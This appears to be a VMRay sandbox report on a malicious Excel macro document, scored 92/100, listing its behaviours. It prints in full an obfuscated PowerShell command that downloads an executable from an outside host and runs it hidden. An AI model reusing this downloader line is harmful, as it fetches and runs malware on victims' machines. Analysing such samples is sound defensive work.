23bd91a7...5d77

VTI SCORE: 92/100

Target:

win7_64_sp1-mso2016 | ms_office

Classification:

23bd91a75b2e80556c099d5a4f57760a1e4d77e82ec38bbe9fc2e7ba17815d77 (SHA256)

23bd91a75b2e80556c099d5a4f57760a1e4d77e82ec38bbe9fc2e7ba17815d77.xls

Excel Document

Created at 2018-02-27 09:02:00

Severity	Category	Operation	Classification
4/5	Process	Creates process	-
Creates process "cMd /c"poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen "do{sleep 25;(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('https://formaversa.co/trq','%localappdata%.exe')}while(!$?);&(\"{0}{2}{1}\"-f'star','ss','t-proce') '%localappdata%.exe'""". ... VTI Actions Go to Function Call
Creates process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe". ... VTI Actions Go to Function Call
3/5	Network	Performs DNS request	-
Resolves host name "formaversa.co". ... VTI Actions Go to Function Call
2/5	VBA Macro	Executes application	-
Shell bigtowerstone, msoAlignLefts ... VTI Actions
1/5	Process	Creates system object	-
Creates mutex with name "Global\.net clr networking". ... VTI Actions Go to Function Call
1/5	VBA Macro	Executes macro on specific worksheet event	-
Executes macro on "Open Workbook" event. ... VTI Actions

Function Logfile

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".

Before

After